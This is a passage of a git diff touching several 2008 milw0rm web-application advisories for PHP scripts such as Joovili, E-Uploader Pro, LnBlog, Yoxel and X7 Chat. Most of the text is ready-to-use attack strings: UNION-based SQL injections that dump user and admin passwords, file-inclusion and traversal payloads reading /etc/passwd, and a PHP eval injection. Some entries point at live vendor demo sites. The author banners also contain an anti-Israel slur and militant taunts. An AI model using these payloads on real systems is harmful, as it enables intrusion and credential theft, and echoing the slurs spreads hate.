+Download script: http://rapidshare.com/files/96178834/Joovili.Patch.3.0.1__2.Themes.WST.rar.html
+Vulnerability Class: SQL Injection
+Condition: magic_quotes_gpc = Off
+
+http://localhost/[installdir]/search.php
+
+Search Music:
+
+Exploit 1: 
+
+'+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8+from+joovili_users/*
+
+Exploit 2:
+
+'+union+select+1,2,3,concat_ws(0x3a,admin_username,admin_password),5,6,7,8+from+joovili_admins/*
+
+
+Exploit 1:
+
+http://localhost/[installdir]/view.blog.php?id='+union+select+1,2,concat_ws(0x3a,username,password),user(),version(),6+from+joovili_users/*
+
+Exploit 2:
+
+http://localhost/[installdir]/view.blog.php?id='+union+select+1,2,concat_ws(0x3a,admin_username,admin_password),user(),version(),6+from+joovili_admins/*
+
+Exploit 1:
+
+http://localhost/[installdir]/view.event.php?id='+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15+from+joovili_users/*
+
+Exploit 2:
+
+http://localhost/[installdir]/view.event.php?id='+union+select+1,2,concat_ws(0x3a,admin_username,admin_password),4,5,6,7,8,9,10,11,12,13,14,15+from+joovili_admins/*
+
+
+http://localhost/[installdir]/view.group.php?id='+union+select+1,2,user(),4,5,6,7,8,9/*
+http://localhost/[installdir]/view.music.php?id='+union+select+1,2,3,version(),5,6,7,8/*
+http://localhost/[installdir]/view.picture.php?id='+union+select+1,user(),3,4,5,6,7/*
+http://localhost/[installdir]/view.video.php?id='+union+select+1,2,3,user(),5,6,7,8/*
+
+# milw0rm.com [2008-09-27]
diff --git a/platforms/php/webapps/6596.txt b/platforms/php/webapps/6596.txt
index 6378d691a..a4642f8ab 100755
--- a/platforms/php/webapps/6596.txt
+++ b/platforms/php/webapps/6596.txt
@@ -1,33 +1,33 @@
-E-Uploader Pro <= 1.0 SQL Injection Vulnerability
-
-Author: ~!Dok_tOR!~
-Date found: 26.08.08
-Product: E-Uploader Pro
-Version: 1.0
-Price: $49
-URL: www.scriptsfrenzy.com
-Download script: http://rapidshare.com/files/18285945/E-UploaderPro.PHP.NULL-DGT_license.zip
-Vulnerability Class: SQL Injection
-Condition: magic_quotes_gpc = Off
-
-Exploit 1:
-
-http://localhost/[installdir]/browser.php?view='+union+select+1,concat_ws(0x3a,user,pass),3,4,5,6,7+from+users/*
-
-Exploit 2:
-
-http://localhost/[installdir]/browser.php?view='+union+select+1,concat_ws(0x3a,admin_user,admin_pass),3,4,5,6,7+from+settings/*
-
-Adminka:
-
-http://localhost/[installdir]/admin.php
-
-
-http://localhost/[installdir]/img.php?id='+union+select+1,2,user()/*
-http://localhost/[installdir]/file.php?id='+union+select+1,2,3/*
-http://localhost/[installdir]/mail.php?id='+union+select+1,2,3/*
-http://localhost/[installdir]/thumb.php?id='+union+select+1,2,user()/*
-http://localhost/[installdir]/zip.php?id='+union+select+1,2,3/*
-http://localhost/[installdir]/zipit.php?id='+union+select+1,2,3,4,5,6,7/*
-
-# milw0rm.com [2008-09-27]
+E-Uploader Pro <= 1.0 SQL Injection Vulnerability
+
+Author: ~!Dok_tOR!~
+Date found: 26.08.08
+Product: E-Uploader Pro
+Version: 1.0
+Price: $49
+URL: www.scriptsfrenzy.com
+Download script: http://rapidshare.com/files/18285945/E-UploaderPro.PHP.NULL-DGT_license.zip
+Vulnerability Class: SQL Injection
+Condition: magic_quotes_gpc = Off
+
+Exploit 1:
+
+http://localhost/[installdir]/browser.php?view='+union+select+1,concat_ws(0x3a,user,pass),3,4,5,6,7+from+users/*
+
+Exploit 2:
+
+http://localhost/[installdir]/browser.php?view='+union+select+1,concat_ws(0x3a,admin_user,admin_pass),3,4,5,6,7+from+settings/*
+
+Adminka:
+
+http://localhost/[installdir]/admin.php
+
+
+http://localhost/[installdir]/img.php?id='+union+select+1,2,user()/*
+http://localhost/[installdir]/file.php?id='+union+select+1,2,3/*
+http://localhost/[installdir]/mail.php?id='+union+select+1,2,3/*
+http://localhost/[installdir]/thumb.php?id='+union+select+1,2,user()/*
+http://localhost/[installdir]/zip.php?id='+union+select+1,2,3/*
+http://localhost/[installdir]/zipit.php?id='+union+select+1,2,3,4,5,6,7/*
+
+# milw0rm.com [2008-09-27]
diff --git a/platforms/php/webapps/6598.txt b/platforms/php/webapps/6598.txt
index 9275b8dc6..7d003d929 100755
--- a/platforms/php/webapps/6598.txt
+++ b/platforms/php/webapps/6598.txt
@@ -1,27 +1,27 @@
-**************************************************************************************
-
-Author : By DaRkLiFe
-Greetz : str0ke & S.VV.A.T.
-
-**************************************************************************************
-Script   : The Concord Asset, Software, and Ticket system(CoAST) 0.95 Remote File Inclusion Vulnerability
-
-Download :http://downloads.sourceforge.net/coastal/coast-0.95.tgz?modtime=1222363198&big_mirror=0
-
-**************************************************************************************
-
-Exploit : Site.com/script_path/coast/header.php?sections_file=Shellz?
-
-
-**************************************************************************************
-
-The header.php.dist file exists and it has to be   renamed into header.php as given in instructions.
-
-Vulberable : line 201 : 
-
-**************************************************************************************
-
-THANKS ! GREETZ ! 
-**************************************************************************************
-
-# milw0rm.com [2008-09-27]
+**************************************************************************************
+
+Author : By DaRkLiFe
+Greetz : str0ke & S.VV.A.T.
+
+**************************************************************************************
+Script   : The Concord Asset, Software, and Ticket system(CoAST) 0.95 Remote File Inclusion Vulnerability
+
+Download :http://downloads.sourceforge.net/coastal/coast-0.95.tgz?modtime=1222363198&big_mirror=0
+
+**************************************************************************************
+
+Exploit : Site.com/script_path/coast/header.php?sections_file=Shellz?
+
+
+**************************************************************************************
+
+The header.php.dist file exists and it has to be   renamed into header.php as given in instructions.
+
+Vulberable : line 201 : 
+
+**************************************************************************************
+
+THANKS ! GREETZ ! 
+**************************************************************************************
+
+# milw0rm.com [2008-09-27]
diff --git a/platforms/php/webapps/6601.txt b/platforms/php/webapps/6601.txt
index bbd310206..906809ddf 100755
--- a/platforms/php/webapps/6601.txt
+++ b/platforms/php/webapps/6601.txt
@@ -1,40 +1,39 @@
-
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- ###############################################################
- #  [ LnBlog <= 0.9.0 ]   Local File Inclusion Vulnerability   #
- ###############################################################
- #
- # Script: "LnBlog A cross-platform, file-based weblog/mini-CMS."
- #
- # Script site: http://lnblog.skepticats.com/
- # Download: http://lnblog.skepticats.com/content/download/
- #	     http://sourceforge.net/projects/lnblog/
- #
- # Vuln: http://site.com/[lnblog-0.9.0]/pages/showblog.php?plugin=../../../../../../../etc/passwd%00
- #      
- #
- # Bug: ./lnblog-0.9.0/pages/showblog.php (lines: 109,110)
- #
- # ...
- #	} elseif ( isset($_GET['plugin']) ) {
- #		require_once("plugins/".$_GET['plugin'].".php");
- # ... 	 
- #
- #
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-09-27]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ ###############################################################
+ #  [ LnBlog <= 0.9.0 ]   Local File Inclusion Vulnerability   #
+ ###############################################################
+ #
+ # Script: "LnBlog A cross-platform, file-based weblog/mini-CMS."
+ #
+ # Script site: http://lnblog.skepticats.com/
+ # Download: http://lnblog.skepticats.com/content/download/
+ #	     http://sourceforge.net/projects/lnblog/
+ #
+ # Vuln: http://site.com/[lnblog-0.9.0]/pages/showblog.php?plugin=../../../../../../../etc/passwd%00
+ #      
+ #
+ # Bug: ./lnblog-0.9.0/pages/showblog.php (lines: 109,110)
+ #
+ # ...
+ #	} elseif ( isset($_GET['plugin']) ) {
+ #		require_once("plugins/".$_GET['plugin'].".php");
+ # ... 	 
+ #
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-09-27]
diff --git a/platforms/php/webapps/6602.txt b/platforms/php/webapps/6602.txt
index 5f26a6964..ecf04f2fe 100755
--- a/platforms/php/webapps/6602.txt
+++ b/platforms/php/webapps/6602.txt
@@ -1,42 +1,41 @@
-
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- ##############################################################
- #  [ PlugSpace v0.1 ]   Local File Inclusion Vulnerability   #
- ##############################################################
- #
- # Download: http://sourceforge.net/projects/plugspace/
- #
- # Vuln: http://site.com/[plugspace]/index.php?navi=../../../../../../../etc/passwd%00
- #      
- #
- # Bug: ./plugspace/index.php (lines: 64-81)
- #
- # ...
- # 64:		if (!isset($_GET['navi']))
- # 65:		{
- #		...	
- # 77:		}
- # 78:		else
- # 79:		{
- # 80:			include("plugins/".$_GET['navi']."/main.php");  	// LFI
- # 81:		}
- # ... 	 
- #
- #
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-09-27]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ ##############################################################
+ #  [ PlugSpace v0.1 ]   Local File Inclusion Vulnerability   #
+ ##############################################################
+ #
+ # Download: http://sourceforge.net/projects/plugspace/
+ #
+ # Vuln: http://site.com/[plugspace]/index.php?navi=../../../../../../../etc/passwd%00
+ #      
+ #
+ # Bug: ./plugspace/index.php (lines: 64-81)
+ #
+ # ...
+ # 64:		if (!isset($_GET['navi']))
+ # 65:		{
+ #		...	
+ # 77:		}
+ # 78:		else
+ # 79:		{
+ # 80:			include("plugins/".$_GET['navi']."/main.php");  	// LFI
+ # 81:		}
+ # ... 	 
+ #
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-09-27]
diff --git a/platforms/php/webapps/6603.txt b/platforms/php/webapps/6603.txt
index 21a1d6612..0862778db 100755
--- a/platforms/php/webapps/6603.txt
+++ b/platforms/php/webapps/6603.txt
@@ -1,55 +1,55 @@
-################################################################ 
-#       .___             __          _______       .___        # 
-#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
-#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
-#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
-#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
-#        \/                  \/             \/                 # 
-#                   ___________   ______  _  __                # 
-#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
-#                 \  \___|  | \/\  ___/\     /                 # 
-#                  \___  >__|    \___  >\/\_/                  # 
-#      est.2007        \/            \/   forum.darkc0de.com   # 
-################################################################ 
-# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
-#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz        #
-#        and all darkc0de and NikTrix members               ---# 
-################################################################ 
-# 
-# Author: r45c4l 
-# 
-# Home  : www.darkc0de.com & niktrix.info
-# 
-# Email : r45c4l@hotmail.com 
-# 
-# Share the c0de! 
-# 
-################################################################ 
-# 
-# Title:  MyCard script  1.0.2 (gallery.php?id) SQL Injection
-#
-# VEndor: http://www.tufat.com/s_business_card_designer.htm
-# 
-#
-###########################################################
-#
-# d0rk: Powered by MyCard
-#
-###########################################################
- 
-     POC :- 
-	
-	http://www.site.com/[path]/gallery.php?id=-1+union+select+1,concat(login_id,0x3a,login_pass),2,3+from+pcard_user/*        
-   
-     Live Demo: 
-	
-	For live demo first go here : http://demo.tufat.com/mycard/index.php and register and then u can test like this :
-
-	http://demo.tufat.com/mycard/gallery.php?id=-1+union+select+1,concat(login_id,0x3a,login_pass),2,3+from+pcard_user/*
- 
-###########################################################
-#
-#  Bug discovered : 28 Sep.2008
-###########################################################
-
-# milw0rm.com [2008-09-27]
+################################################################ 
+#       .___             __          _______       .___        # 
+#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
+#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
+#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
+#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
+#        \/                  \/             \/                 # 
+#                   ___________   ______  _  __                # 
+#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
+#                 \  \___|  | \/\  ___/\     /                 # 
+#                  \___  >__|    \___  >\/\_/                  # 
+#      est.2007        \/            \/   forum.darkc0de.com   # 
+################################################################ 
+# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
+#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz        #
+#        and all darkc0de and NikTrix members               ---# 
+################################################################ 
+# 
+# Author: r45c4l 
+# 
+# Home  : www.darkc0de.com & niktrix.info
+# 
+# Email : r45c4l@hotmail.com 
+# 
+# Share the c0de! 
+# 
+################################################################ 
+# 
+# Title:  MyCard script  1.0.2 (gallery.php?id) SQL Injection
+#
+# VEndor: http://www.tufat.com/s_business_card_designer.htm
+# 
+#
+###########################################################
+#
+# d0rk: Powered by MyCard
+#
+###########################################################
+ 
+     POC :- 
+	
+	http://www.site.com/[path]/gallery.php?id=-1+union+select+1,concat(login_id,0x3a,login_pass),2,3+from+pcard_user/*        
+   
+     Live Demo: 
+	
+	For live demo first go here : http://demo.tufat.com/mycard/index.php and register and then u can test like this :
+
+	http://demo.tufat.com/mycard/gallery.php?id=-1+union+select+1,concat(login_id,0x3a,login_pass),2,3+from+pcard_user/*
+ 
+###########################################################
+#
+#  Bug discovered : 28 Sep.2008
+###########################################################
+
+# milw0rm.com [2008-09-27]
diff --git a/platforms/php/webapps/6604.txt b/platforms/php/webapps/6604.txt
index e53c4e134..9fa8b5819 100755
--- a/platforms/php/webapps/6604.txt
+++ b/platforms/php/webapps/6604.txt
@@ -1,55 +1,55 @@
-################################################################ 
-#       .___             __          _______       .___        # 
-#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
-#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
-#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
-#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
-#        \/                  \/             \/                 # 
-#                   ___________   ______  _  __                # 
-#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
-#                 \  \___|  | \/\  ___/\     /                 # 
-#                  \___  >__|    \___  >\/\_/                  # 
-#      est.2007        \/            \/   forum.darkc0de.com   # 
-################################################################ 
-# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
-#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz        #
-#        and all darkc0de and NikTrix members               ---# 
-################################################################ 
-# 
-# Author: r45c4l 
-# 
-# Home  : www.darkc0de.com & niktrix.info
-# 
-# Email : r45c4l@hotmail.com 
-# 
-# Share the c0de! 
-# 
-################################################################ 
-# 
-# Title:  PowerPortal 2 Local Directory Traversal Vulnerability
-#
-# VEndor: http://www.powerportal2.com/
-# 
-#
-###########################################################
-#
-# d0rk: n/a
-#
-###########################################################
- 
-     POC :- 
-	
-	http://site.com/index/Gallery/?path=../../../../../../../       
-   
-     Live Demo: 
-	
-	http://demo.powerportal2.com/index/Gallery/?path=../../../../../../../
-
-	http://demo.powerportal2.com/index/Gallery/?path=../../../../../../../dev
- 
-###########################################################
-#
-#  Bug discovered : 28 Sep.2008
-###########################################################
-
-# milw0rm.com [2008-09-27]
+################################################################ 
+#       .___             __          _______       .___        # 
+#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
+#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
+#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
+#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
+#        \/                  \/             \/                 # 
+#                   ___________   ______  _  __                # 
+#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
+#                 \  \___|  | \/\  ___/\     /                 # 
+#                  \___  >__|    \___  >\/\_/                  # 
+#      est.2007        \/            \/   forum.darkc0de.com   # 
+################################################################ 
+# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
+#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz        #
+#        and all darkc0de and NikTrix members               ---# 
+################################################################ 
+# 
+# Author: r45c4l 
+# 
+# Home  : www.darkc0de.com & niktrix.info
+# 
+# Email : r45c4l@hotmail.com 
+# 
+# Share the c0de! 
+# 
+################################################################ 
+# 
+# Title:  PowerPortal 2 Local Directory Traversal Vulnerability
+#
+# VEndor: http://www.powerportal2.com/
+# 
+#
+###########################################################
+#
+# d0rk: n/a
+#
+###########################################################
+ 
+     POC :- 
+	
+	http://site.com/index/Gallery/?path=../../../../../../../       
+   
+     Live Demo: 
+	
+	http://demo.powerportal2.com/index/Gallery/?path=../../../../../../../
+
+	http://demo.powerportal2.com/index/Gallery/?path=../../../../../../../dev
+ 
+###########################################################
+#
+#  Bug discovered : 28 Sep.2008
+###########################################################
+
+# milw0rm.com [2008-09-27]
diff --git a/platforms/php/webapps/6605.txt b/platforms/php/webapps/6605.txt
index b59cbd038..0f958b109 100755
--- a/platforms/php/webapps/6605.txt
+++ b/platforms/php/webapps/6605.txt
@@ -1,56 +1,56 @@
-                          ||          ||   | ||        
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
-                  ( :   /    (_)    /           (   .  
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-
-
-<> Found by :  Cyb3r-1sT
-
-<> C0ntact  : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com
-                   
-<> Groups   : InjEctOr5 T3am 
-
-
-=======================================================
-+++++++++++++ R3membeR Kings of injection +++++++++++++
-=======================================================
-
-
-<<->> script    :  PHP-Lance v1.52
- 
-<<->> Demo site : www.scriptdemo.com/php-lance
-
-
-=======================================================
-++++++++++++++++ pWning israel fuckers ++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : N0-WaY
-
-<<->> Exploit :
-
-   >>>>  www.site.me/patch/show.php?catid=-9999'+union+select+concat(user(),0x3a,database(),0x3a,version())/*
-
-=======================================================
-+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
-=======================================================
-
-<<->> InjEctOr5 TeaM   
-
-<<->> All freind and All muslims
-
-# milw0rm.com [2008-09-27]
+                          ||          ||   | ||        
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                  ( :   /    (_)    /           (   .  
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+
+
+<> Found by :  Cyb3r-1sT
+
+<> C0ntact  : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com
+                   
+<> Groups   : InjEctOr5 T3am 
+
+
+=======================================================
++++++++++++++ R3membeR Kings of injection +++++++++++++
+=======================================================
+
+
+<<->> script    :  PHP-Lance v1.52
+ 
+<<->> Demo site : www.scriptdemo.com/php-lance
+
+
+=======================================================
+++++++++++++++++ pWning israel fuckers ++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : N0-WaY
+
+<<->> Exploit :
+
+   >>>>  www.site.me/patch/show.php?catid=-9999'+union+select+concat(user(),0x3a,database(),0x3a,version())/*
+
+=======================================================
++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
+=======================================================
+
+<<->> InjEctOr5 TeaM   
+
+<<->> All freind and All muslims
+
+# milw0rm.com [2008-09-27]
diff --git a/platforms/php/webapps/6606.txt b/platforms/php/webapps/6606.txt
index 0811ad5a5..9686ab7aa 100755
--- a/platforms/php/webapps/6606.txt
+++ b/platforms/php/webapps/6606.txt
@@ -1,66 +1,65 @@
-
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- ###############################################################
- #  [ Yoxel <= 1.23beta ]   PHP code Injection Vulnerability   #
- ###############################################################
- #
- # Script: "Yoxel is a hidden gem. This Open Source project provides customer/business focused Agile Product Management tools in PHP."
- #
- # Script site: http://www.yoxel.com/
- # Download: http://sourceforge.net/projects/yoxel/
- #
- # Vuln:
- # http://site.com/[yoxel_v1.23beta]/itpm/itpm_estimate.php?a=LOCAL_OR_REMOTE_FILE&rid=1&proj_id=);include($_GET[a]);die(2
- # http://site.com/[yoxel_v1.23beta]/itpm/itpm_estimate.php?a=LOCAL_OR_REMOTE_FILE&proj_id=);include($_GET[a]);die(2
- # 
- #
- # (1) Bug: ./yoxel_v1.23beta/itpm/itpm_estimate.php (line: 40)
- #
- # ...
- #    require_once('includes/project/estimate_inc.php');
- # ... 			    
- #
- # 
- # (2) Bug: ./yoxel_v1.23beta/includes/project/estimate_inc.php (lines: 85-99)
- #
- # ...
- #	if(isset($_GET['rid'])){
- #		$rids=explode(':',$_GET['rid']);
- #		if(isset($_GET['proj_id']) && $_GET['proj_id']){
- #			$proj_id=$_GET['proj_id'];
- #			eval("\$pps= new $cname(".$_GET['proj_id'].");");		// PHP inj 1
- #		}
- #	}elseif(isset($_GET['proj_id']) && !empty($_GET['proj_id'])){
- # 		$proj_id=$_GET['proj_id'];
- #
- #		if(isset($_GET['pr_list_type']))
- # 			$plt=$_GET['pr_list_type'];
- #		else
- # 			$plt='full';
- # 
- #		eval("\$pps= new $cname($proj_id);");					// PHP inj 2
- # ... 			    
- #
- #				 
- # After php injection: eval( $pps= new ITPlan();include('/etc/passwd');die(2); );
- #
- # IMPORTANT: This bug doesn't work, when you aren't logged in Yoxel ;(((
- #
- # 
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-09-27]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ ###############################################################
+ #  [ Yoxel <= 1.23beta ]   PHP code Injection Vulnerability   #
+ ###############################################################
+ #
+ # Script: "Yoxel is a hidden gem. This Open Source project provides customer/business focused Agile Product Management tools in PHP."
+ #
+ # Script site: http://www.yoxel.com/
+ # Download: http://sourceforge.net/projects/yoxel/
+ #
+ # Vuln:
+ # http://site.com/[yoxel_v1.23beta]/itpm/itpm_estimate.php?a=LOCAL_OR_REMOTE_FILE&rid=1&proj_id=);include($_GET[a]);die(2
+ # http://site.com/[yoxel_v1.23beta]/itpm/itpm_estimate.php?a=LOCAL_OR_REMOTE_FILE&proj_id=);include($_GET[a]);die(2
+ # 
+ #
+ # (1) Bug: ./yoxel_v1.23beta/itpm/itpm_estimate.php (line: 40)
+ #
+ # ...
+ #    require_once('includes/project/estimate_inc.php');
+ # ... 			    
+ #
+ # 
+ # (2) Bug: ./yoxel_v1.23beta/includes/project/estimate_inc.php (lines: 85-99)
+ #
+ # ...
+ #	if(isset($_GET['rid'])){
+ #		$rids=explode(':',$_GET['rid']);
+ #		if(isset($_GET['proj_id']) && $_GET['proj_id']){
+ #			$proj_id=$_GET['proj_id'];
+ #			eval("\$pps= new $cname(".$_GET['proj_id'].");");		// PHP inj 1
+ #		}
+ #	}elseif(isset($_GET['proj_id']) && !empty($_GET['proj_id'])){
+ # 		$proj_id=$_GET['proj_id'];
+ #
+ #		if(isset($_GET['pr_list_type']))
+ # 			$plt=$_GET['pr_list_type'];
+ #		else
+ # 			$plt='full';
+ # 
+ #		eval("\$pps= new $cname($proj_id);");					// PHP inj 2
+ # ... 			    
+ #
+ #				 
+ # After php injection: eval( $pps= new ITPlan();include('/etc/passwd');die(2); );
+ #
+ # IMPORTANT: This bug doesn't work, when you aren't logged in Yoxel ;(((
+ #
+ # 
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-09-27]
diff --git a/platforms/php/webapps/6607.txt b/platforms/php/webapps/6607.txt
index fc0641780..dde20f021 100755
--- a/platforms/php/webapps/6607.txt
+++ b/platforms/php/webapps/6607.txt
@@ -1,23 +1,23 @@
--------------------------------------------------------------------------
-  --          JIKI Team [ JIKO + KIl1er + merwan-neo ]        ---
--------------------------------------------------------------------------
-# Author  : jiko
-# email  : jalikom@hotmail.com
-# Home   : www.no-exploit.Com
-# Script  : X7 Chat Version 2.0.1
-# Bug   :  Local File Inclusion Vulnerability
-=========================JIkI Team===================
-# Exploit  :
- 
- http://localhost/[script]/help/mini.php?help_file=[file]
-=========================JIKI Team===================
- greetz : all my friend and all No-back members and tryag.Com Gold_M
-          Cochlain , Hcj , Hassin X , all muslims
- visit: www.no-back.org & www.tryag.com & ==> www.no-exploit.Com
--------------------------------------------------------------------------
-  --            JIKI Team [ JIKO + KIl1er ]    --
--------------------------------------------------------------------------
-------==        troops of Mohamed comming inchalah     =-----------------
-Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc
-
-# milw0rm.com [2008-09-27]
+-------------------------------------------------------------------------
+  --          JIKI Team [ JIKO + KIl1er + merwan-neo ]        ---
+-------------------------------------------------------------------------
+# Author  : jiko
+# email  : jalikom@hotmail.com
+# Home   : www.no-exploit.Com
+# Script  : X7 Chat Version 2.0.1
+# Bug   :  Local File Inclusion Vulnerability
+=========================JIkI Team===================
+# Exploit  :
+ 
+ http://localhost/[script]/help/mini.php?help_file=[file]
+=========================JIKI Team===================
+ greetz : all my friend and all No-back members and tryag.Com Gold_M
+          Cochlain , Hcj , Hassin X , all muslims
+ visit: www.no-back.org & www.tryag.com & ==> www.no-exploit.Com
+-------------------------------------------------------------------------
+  --            JIKI Team [ JIKO + KIl1er ]    --
+-------------------------------------------------------------------------
+------==        troops of Mohamed comming inchalah     =-----------------
+Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc
+
+# milw0rm.com [2008-09-27]
